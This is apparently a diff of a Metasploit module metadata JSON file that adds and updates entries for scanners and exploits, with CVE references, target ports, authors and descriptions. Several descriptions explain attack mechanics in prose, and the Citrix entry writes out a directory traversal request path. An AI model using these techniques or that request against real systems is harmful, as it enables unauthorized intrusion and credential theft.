    "path": "/modules/auxiliary/gather/shodan_search.rb",
    "is_install_path": true,
    "ref_name": "gather/shodan_search",
@@ -18716,16 +19198,17 @@
    "disclosure_date": "2020-04-09",
    "type": "auxiliary",
    "author": [
+      "Hynek Petrak",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          the vmdir service in VMware vCenter Server version 6.7 prior to the\n          6.7U3f update.",
+    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          the vmdir service in VMware vCenter Server version 6.7 prior to the\n          6.7U3f update, only if upgraded from a previous release line, such as\n          6.0 or 6.5.",
    "references": [
      "CVE-2020-3952",
      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
    ],
    "platform": "",
    "arch": "",
-    "rport": 389,
+    "rport": 636,
    "autofilter_ports": [

    ],
@@ -18733,7 +19216,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-05-21 21:01:52 +0000",
+    "mod_time": "2020-07-25 00:13:12 +0000",
    "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
    "is_install_path": true,
    "ref_name": "gather/vmware_vcenter_vmdir_ldap",
@@ -18779,7 +19262,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-03-05 03:41:41 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_deployment_services_shares",
@@ -22965,13 +23448,15 @@
    "disclosure_date": "2019-12-17",
    "type": "auxiliary",
    "author": [
+      "Mikhail Klyuchnikov",
      "Erik Wynter",
      "altonjx"
    ],
    "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n        a \"[global]\" directive in smb.conf, which this file should always contain.",
    "references": [
      "CVE-2019-19781",
-      "URL-https://support.citrix.com/article/CTX267027/"
+      "URL-https://support.citrix.com/article/CTX267027/",
+      "URL-https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/"
    ],
    "platform": "",
    "arch": "",
@@ -22992,7 +23477,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-01-14 11:21:03 +0000",
+    "mod_time": "2020-07-08 14:36:42 +0000",
    "path": "/modules/auxiliary/scanner/http/citrix_dir_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/citrix_dir_traversal",
@@ -24791,6 +25276,56 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/fortimail_login_bypass_detection": {
+    "name": "FortiMail Unauthenticated Login Bypass Scanner",
+    "fullname": "auxiliary/scanner/http/fortimail_login_bypass_detection",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Mike Connor",
+      "Juerg Schweingruber <juerg.schweingruber@redguard.ch>",
+      "Patrick Schmid <patrick.schmid@redguard.ch>"
+    ],
+    "description": "This module attempts to detect instances of FortiMail vulnerable\n        against an unauthenticated login bypass (CVE-2020-9294).",
+    "references": [
+      "CVE-2020-9294",
+      "URL-https://fortiguard.com/psirt/FG-IR-20-045",
+      "URL-https://www.redguard.ch/blog/2020/07/02/fortimail-unauthenticated-login-bypass/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-07-09 09:26:39 +0000",
+    "path": "/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/fortimail_login_bypass_detection",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/fortinet_ssl_vpn": {
    "name": "Fortinet SSL VPN Bruteforce Login Utility",
    "fullname": "auxiliary/scanner/http/fortinet_ssl_vpn",
@@ -27031,6 +27566,52 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/jupyter_login": {
+    "name": "Jupyter Login Utility",
+    "fullname": "auxiliary/scanner/http/jupyter_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "This module checks if authentication is required on a Jupyter Lab or Notebook server. If it is, this module will\n        bruteforce the password. Jupyter only requires a password to authenticate, usernames are not used. This module\n        is compatible with versions 4.3.0 (released 2016-12-08) and newer.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8888,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-08-25 16:51:47 +0000",
+    "path": "/modules/auxiliary/scanner/http/jupyter_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/jupyter_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/kodi_traversal": {
    "name": "Kodi 17.0 Local File Inclusion Vulnerability",
    "fullname": "auxiliary/scanner/http/kodi_traversal",
@@ -28742,7 +29323,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-02-25 10:14:02 +0000",
+    "mod_time": "2020-06-25 17:19:41 +0000",
    "path": "/modules/auxiliary/scanner/http/owa_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_login",
@@ -30151,6 +30732,56 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/springcloud_directory_traversal": {
+    "name": "Directory Traversal in Spring Cloud Config Server",
+    "fullname": "auxiliary/scanner/http/springcloud_directory_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-06-01",
+    "type": "auxiliary",
+    "author": [
+      "Fei Lu",
+      "bfpiaoran <bfpiaoran@qq.com>",
+      "Dhiraj Mishra"
+    ],
+    "description": "This module exploits an unauthenticated directory traversal vulnerability\n        which exists in Spring Cloud Config versions 2.2.x prior to 2.2.3 and\n        2.1.x prior to 2.1.9, and older unsupported versions. Spring\n        Cloud Config listens by default on port 8888.",
+    "references": [
+      "CVE-2020-5410",
+      "URL-https://tanzu.vmware.com/security/cve-2020-5410",
+      "URL-https://xz.aliyun.com/t/7877"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8888,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-07-06 09:47:58 +0000",
+    "path": "/modules/auxiliary/scanner/http/springcloud_directory_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/springcloud_directory_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/springcloud_traversal": {
    "name": "Spring Cloud Config Server Directory Traversal",
    "fullname": "auxiliary/scanner/http/springcloud_traversal",
@@ -30209,9 +30840,10 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "willis"
+      "willis",
+      "0x44434241"
    ],
-    "description": "A misconfigured Squid proxy can allow an attacker to make requests on his behalf.\n          This may give the attacker information about devices that he cannot reach but the\n          Squid proxy can. For example, an attacker can make requests for internal IP addresses\n          against a misconfigured open Squid proxy exposed to the Internet, therefore performing\n          an internal port scan. The error messages returned by the proxy are used to determine\n          if the port is open or not.\n\n          Many Squid proxies use custom error codes so your mileage may vary. The open_proxy\n          module can be used to test for open proxies, though a Squid proxy does not have to be\n          open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows\n          the attack to pivot to another part of the network).",
+    "description": "A exposed Squid proxy will usually allow an attacker to make requests on\n        their behalf. If misconfigured, this may give the attacker information\n        about devices that they cannot normally reach. For example, an attacker\n        may be able to make requests for internal IP addresses against an open\n        Squid proxy exposed to the Internet, therefore performing a port scan\n        against the internal network.\n\n        The `auxiliary/scanner/http/open_proxy` module can be used to test for\n        open proxies, though a Squid proxy does not have to be on the open\n        Internet in order to allow for pivoting (e.g. an Intranet Squid proxy\n        which allows the attack to pivot to another part of the internal\n        network).\n\n        This module will not be able to scan network ranges or ports denied by\n        Squid ACLs. Fortunately it is possible to detect whether a host was up\n        and the port was closed, or if the request was blocked by an ACL, based\n        on the response Squid gives. This feedback is provided to the user in\n        meterpreter `VERBOSE` output, otherwise only open and permitted ports\n        are printed.",
    "references": [

    ],
@@ -30234,7 +30866,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-08-21 08:47:05 +0000",
    "path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/squid_pivot_scanning",
@@ -34010,7 +34642,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-08-26 12:34:03 +0000",
    "path": "/modules/auxiliary/scanner/misc/java_rmi_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/java_rmi_server",
@@ -39775,6 +40407,46 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/scada/modbus_banner_grabbing": {
+    "name": "Modbus Banner Grabbing",
+    "fullname": "auxiliary/scanner/scada/modbus_banner_grabbing",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Juan Escobar <juan@null-life.com>",
+      "Ezequiel Fernandez"
+    ],
+    "description": "This module grabs the banner of any device running the Modbus protocol\n          by sending a request with Modbus Function Code 43 (Read Device\n          Identification). Modbus is a data communications protocol originally\n          published by Modicon (now Schneider Electric) in 1979 for use with its\n          programmable logic controllers (PLCs).",
+    "references": [
+      "URL-https://modbus.org/docs/Modbus_Messaging_Implementation_Guide_V1_0b.pdf",
+      "URL-https://en.wikipedia.org/wiki/Modbus#Modbus_TCP_frame_format_(primarily_used_on_Ethernet_networks)",
+      "URL-https://github.com/industrialarmy/Hello_Proto"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 502,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-09-08 10:51:30 +0000",
+    "path": "/modules/auxiliary/scanner/scada/modbus_banner_grabbing.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/scada/modbus_banner_grabbing",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/scada/modbus_findunitid": {
    "name": "Modbus Unit ID and Station ID Enumerator",
    "fullname": "auxiliary/scanner/scada/modbus_findunitid",
@@ -40399,7 +41071,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-02-26 12:17:59 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_auditor",
@@ -40517,7 +41189,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-09-18 15:02:38 +0000",
+    "mod_time": "2020-06-25 12:18:30 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb1.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb1",
@@ -40554,7 +41226,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-06-25 12:18:30 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb2.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb2",
@@ -40577,8 +41249,9 @@
    "author": [
      "Joshua D. Abraham <jabra@praetorian.com>"
    ],
-    "description": "This module enumerates files from target domain controllers and connects to them via SMB.\n        It then looks for Group Policy Preference XML files containing local/domain user accounts\n        and passwords and decrypts them using Microsofts public AES key. This module has been\n        tested successfully on a Win2k8 R2 Domain Controller.",
+    "description": "This module enumerates files from target domain controllers and connects to them via SMB.\n        It then looks for Group Policy Preference XML files containing local/domain user accounts\n        and passwords and decrypts them using Microsoft's public AES key. This module has been\n        tested successfully on a Win2k8 R2 Domain Controller.",
    "references": [
+      "CVE-2014-1812",
      "MSB-MS14-025",
      "URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)",
      "URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html",
@@ -40597,7 +41270,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-05-30 10:27:48 +0000",
+    "mod_time": "2020-08-28 16:20:42 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enum_gpp",
@@ -40640,7 +41313,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-06-09 13:24:27 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
@@ -40849,7 +41522,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-05-23 14:19:33 +0000",
+    "mod_time": "2020-04-27 12:54:53 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_ms17_010",
@@ -40919,9 +41592,11 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "hdm <x@hdm.io>"
+      "hdm <x@hdm.io>",
+      "Spencer McIntyre",
+      "Christophe De La Fuente"
    ],
-    "description": "Display version information about each system",
+    "description": "Fingerprint and display version information about SMB servers. Protocol\n        information and host operating system (if available) will be reported.\n        Host operating system detection requires the remote server to support\n        version 1 of the SMB protocol. Compression and encryption capability\n        negotiation is only present in version 3.1.1.",
    "references": [

    ],
@@ -40937,7 +41612,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-10-02 20:22:51 +0000",
+    "mod_time": "2020-09-04 10:54:20 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
@@ -45093,11 +45768,14 @@
    "type": "auxiliary",
    "author": [
      "ddz <ddz@theta44.org>",
-      "hdm <x@hdm.io>"
+      "hdm <x@hdm.io>",
+      "h00die"
    ],
    "description": "This module provides a fake SMTP service that\n      is designed to capture authentication credentials.",
    "references": [
-
+      "URL-https://www.samlogic.net/articles/smtp-commands-reference-auth.htm",
+      "URL-tools.ietf.org/html/rfc5321",
+      "URL-http://fehcom.de/qmail/smtpauth.html"
    ],
    "platform": "",
    "arch": "",
@@ -45109,7 +45787,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-05-12 22:15:21 +0000",
+    "mod_time": "2020-07-11 17:30:06 +0000",
    "path": "/modules/auxiliary/server/capture/smtp.rb",
    "is_install_path": true,
    "ref_name": "server/capture/smtp",
@@ -45467,7 +46145,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-05-12 22:15:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/server/http_ntlmrelay.rb",
    "is_install_path": true,
    "ref_name": "server/http_ntlmrelay",
@@ -45957,6 +46635,49 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_server/teamviewer_uri_smb_redirect": {
+    "name": "TeamViewer Unquoted URI Handler SMB Redirect",
+    "fullname": "auxiliary/server/teamviewer_uri_smb_redirect",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Jeffrey Hofmann <me@jeffs.sh>",
+      "h00die"
+    ],
+    "description": "This module exploits an unquoted parameter call within the Teamviewer\n          URI handler to create an SMB connection to an attacker controlled IP.\n          TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870,\n          12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are\n          vulnerable.\n          Only Firefox can be exploited by this vulnerability, as all other\n          browsers encode the space after 'play' and before the SMB location,\n          preventing successful exploitation.\n          Teamviewer 15.4.4445, and 8.0.16642 were succssfully tested against.",
+    "references": [
+      "URL-https://jeffs.sh/CVEs/CVE-2020-13699.txt",
+      "CVE-2020-13699",
+      "URL-https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-18 13:45:28 +0000",
+    "path": "/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb",
+    "is_install_path": true,
+    "ref_name": "server/teamviewer_uri_smb_redirect",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_server/tftp": {
    "name": "TFTP File Server",
    "fullname": "auxiliary/server/tftp",
@@ -46601,7 +47322,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-09-23 15:29:38 +0000",
+    "mod_time": "2020-06-30 18:49:13 +0000",
    "path": "/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb",
    "is_install_path": true,
    "ref_name": "sqli/openemr/openemr_sqli_dump",
@@ -50154,6 +50875,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_apple_ios/browser/safari_jit": {
+    "name": "Safari Webkit JIT Exploit for iOS 7.1.2",
+    "fullname": "exploit/apple_ios/browser/safari_jit",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2016-08-25",
+    "type": "exploit",
+    "author": [
+      "kudima",
+      "Ian Beer",
+      "WanderingGlitch",
+      "timwr"
+    ],
+    "description": "This module exploits a JIT optimization bug in Safari Webkit. This allows us to\n          write shellcode to an RWX memory section in JavaScriptCore and execute it. The\n          shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw,\n          obtains root and disables code signing. Finally we download and execute the\n          meterpreter payload.\n          This module has been tested against iOS 7.1.2 on an iPhone 4.",
+    "references": [
+      "CVE-2016-4669",
+      "CVE-2018-4162",
+      "URL-https://github.com/kudima/exploit_playground/tree/master/iPhone3_1_shell",
+      "URL-https://www.thezdi.com/blog/2018/4/12/inverting-your-assumptions-a-guide-to-jit-comparisons",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=882"
+    ],
+    "platform": "Apple_iOS",
+    "arch": "armle",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-07-30 17:57:43 +0000",
+    "path": "/modules/exploits/apple_ios/browser/safari_jit.rb",
+    "is_install_path": true,
+    "ref_name": "apple_ios/browser/safari_jit",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_apple_ios/browser/safari_libtiff": {
    "name": "Apple iOS MobileSafari LibTIFF Buffer Overflow",
    "fullname": "exploit/apple_ios/browser/safari_libtiff",
@@ -50673,7 +51440,7 @@
      "iZsh",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in the FreeBSD kernel,\n        when running on 64-bit Intel processors.\n\n        By design, 64-bit processors following the X86-64 specification will\n        trigger a general protection fault (GPF) when executing a SYSRET\n        instruction with a non-canonical address in the RCX register.\n\n        However, Intel processors check for a non-canonical address prior to\n        dropping privileges, causing a GPF in privileged mode. As a result,\n        the current userland RSP stack pointer is restored and executed,\n        resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        FreeBSD 8.3-RELEASE (amd64); and\n        FreeBSD 9.0-RELEASE (amd64).",
+    "description": "This module exploits a vulnerability in the FreeBSD kernel,\n          when running on 64-bit Intel processors.\n\n          By design, 64-bit processors following the X86-64 specification will\n          trigger a general protection fault (GPF) when executing a SYSRET\n          instruction with a non-canonical address in the RCX register.\n\n          However, Intel processors check for a non-canonical address prior to\n          dropping privileges, causing a GPF in privileged mode. As a result,\n          the current userland RSP stack pointer is restored and executed,\n          resulting in privileged code execution.\n\n          This module has been tested successfully on:\n\n          FreeBSD 8.3-RELEASE (amd64); and\n          FreeBSD 9.0-RELEASE (amd64).",
    "references": [
      "BID-53856",
      "CVE-2012-0217",
@@ -50698,7 +51465,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-12-21 15:40:01 +0000",
+    "mod_time": "2020-07-18 23:31:34 +0000",
    "path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "freebsd/local/intel_sysret_priv_esc",
@@ -50709,6 +51476,66 @@
    },
    "needs_cleanup": true
  },
+  "exploit_freebsd/local/ip6_setpktopt_uaf_priv_esc": {
+    "name": "FreeBSD ip6_setpktopt Use-After-Free Privilege Escalation",
+    "fullname": "exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2020-07-07",
+    "type": "exploit",
+    "author": [
+      "Andy Nguyen",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a race and use-after-free vulnerability in the\n          FreeBSD kernel IPv6 socket handling. A missing synchronization lock\n          in the `IPV6_2292PKTOPTIONS` option handling in `setsockopt` permits\n          racing `ip6_setpktopt` access to a freed `ip6_pktopts` struct.\n\n          This exploit overwrites the `ip6po_pktinfo` pointer of a `ip6_pktopts`\n          struct in freed memory to achieve arbitrary kernel read/write.\n\n          This module has been tested successfully on:\n\n          FreeBSD 9.0-RELEASE #0 (amd64);\n          FreeBSD 9.1-RELEASE #0 r243825 (amd64);\n          FreeBSD 9.2-RELEASE #0 r255898 (amd64);\n          FreeBSD 9.3-RELEASE #0 r268512 (amd64);\n          FreeBSD 12.0-RELEASE r341666 (amd64); and\n          FreeBSD 12.1-RELEASE r354233 (amd64).",
+    "references": [
+      "CVE-2020-7457",
+      "EDB-48644",
+      "PACKETSTORM-158341",
+      "URL-https://hackerone.com/reports/826026",
+      "URL-https://bsdsec.net/articles/freebsd-announce-freebsd-security-advisory-freebsd-sa-20-20-ipv6",
+      "URL-https://www.freebsd.org/security/patches/SA-20:20/ipv6.patch",
+      "URL-https://github.com/freebsd/freebsd/blob/master/sys/netinet6/ip6_var.h",
+      "URL-https://github.com/freebsd/freebsd/blob/master/sys/netinet6/ip6_output.c"
+    ],
+    "platform": "BSD",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic",
+      "FreeBSD 9.0-RELEASE #0",
+      "FreeBSD 9.1-RELEASE #0 r243825",
+      "FreeBSD 9.2-RELEASE #0 r255898",
+      "FreeBSD 9.3-RELEASE #0 r268512",
+      "FreeBSD 12.0-RELEASE r341666",
+      "FreeBSD 12.1-RELEASE r354233"
+    ],
+    "mod_time": "2020-07-16 21:25:03 +0000",
+    "path": "/modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "freebsd/local/ip6_setpktopt_uaf_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-os-restarts"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_freebsd/local/mmap": {
    "name": "FreeBSD 9 Address Space Manipulation Privilege Escalation",
    "fullname": "exploit/freebsd/local/mmap",
@@ -50769,7 +51596,7 @@
      "stealth",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in the FreeBSD\n        run-time link-editor (rtld).\n\n        The rtld `unsetenv()` function fails to remove `LD_*`\n        environment variables if `__findenv()` fails.\n\n        This can be abused to load arbitrary shared objects using\n        `LD_PRELOAD`, resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        FreeBSD 7.2-RELEASE (amd64); and\n        FreeBSD 8.0-RELEASE (amd64).",
+    "description": "This module exploits a vulnerability in the FreeBSD\n          run-time link-editor (rtld).\n\n          The rtld `unsetenv()` function fails to remove `LD_*`\n          environment variables if `__findenv()` fails.\n\n          This can be abused to load arbitrary shared objects using\n          `LD_PRELOAD`, resulting in privileged code execution.\n\n          This module has been tested successfully on:\n\n          FreeBSD 7.2-RELEASE (amd64); and\n          FreeBSD 8.0-RELEASE (amd64).",
    "references": [
      "BID-37154",
      "CVE-2009-4146",
@@ -50793,7 +51620,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-05-03 09:53:37 +0000",
+    "mod_time": "2020-08-24 11:47:50 +0000",
    "path": "/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "freebsd/local/rtld_execl_priv_esc",
@@ -50926,7 +51753,7 @@
    "targets": [
      "Samba 2.2.x - Bruteforce"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/freebsd/samba/trans2open.rb",
    "is_install_path": true,
    "ref_name": "freebsd/samba/trans2open",
@@ -51748,6 +52575,69 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/apache_ofbiz_deserialiation": {
+    "name": "Apache OFBiz XML-RPC Java Deserialization",
+    "fullname": "exploit/linux/http/apache_ofbiz_deserialiation",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-07-13",
+    "type": "exploit",
+    "author": [
+      "Alvaro Muñoz",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a Java deserialization vulnerability in Apache\n          OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for\n          versions prior to 17.12.04.",
+    "references": [
+      "CVE-2020-9496",
+      "URL-https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz",
+      "URL-https://ofbiz.apache.org/release-notes-17.12.04.html",
+      "URL-https://issues.apache.org/jira/browse/OFBIZ-11716"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-08-17 11:53:39 +0000",
+    "path": "/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_ofbiz_deserialiation",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/astium_sqli_upload": {
    "name": "Astium Remote Code Execution",
    "fullname": "exploit/linux/http/astium_sqli_upload",
@@ -51861,7 +52751,7 @@
    "author": [
      "mr_me <steventhomasseeley@gmail.com>"
    ],
-    "description": "This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP\n         setup with display_errors set to On, which can be used to allow us to upload a malicious\n         ZIP file. On the web application, a blacklist verification is performed before extraction,\n         however it is not sufficient to prevent exploitation.\n\n         You are required to login to the target to reach the vulnerability, however this can be\n         done as a student account and remote registration is enabled by default.\n\n         Just in case remote registration isn't enabled, this module uses 2 vulnerabilities\n         in order to bypass the authentication:\n\n         1. confirm.php Authentication Bypass Type Juggling vulnerability\n         2. password_reminder.php Remote Password Reset TOCTOU vulnerability",
+    "description": "This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP\n          setup with display_errors set to On, which can be used to allow us to upload a malicious\n          ZIP file. On the web application, a blacklist verification is performed before extraction,\n          however it is not sufficient to prevent exploitation.\n\n          You are required to login to the target to reach the vulnerability, however this can be\n          done as a student account and remote registration is enabled by default.\n\n          Just in case remote registration isn't enabled, this module uses 2 vulnerabilities\n          in order to bypass the authentication:\n\n          1. confirm.php Authentication Bypass Type Juggling vulnerability\n          2. password_reminder.php Remote Password Reset TOCTOU vulnerability",
    "references": [
      "URL-http://www.atutor.ca/",
      "URL-http://sourceincite.com/research/src-2016-09/",
@@ -51890,7 +52780,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-08-09 23:34:03 +0000",
+    "mod_time": "2020-06-15 12:15:00 +0000",
    "path": "/modules/exploits/linux/http/atutor_filemanager_traversal.rb",
    "is_install_path": true,
    "ref_name": "linux/http/atutor_filemanager_traversal",
@@ -52552,7 +53442,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2020-05-05 13:33:10 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/cisco_ucs_cloupia_script_rce",
@@ -52636,6 +53526,7 @@
    "disclosure_date": "2019-12-17",
    "type": "exploit",
    "author": [
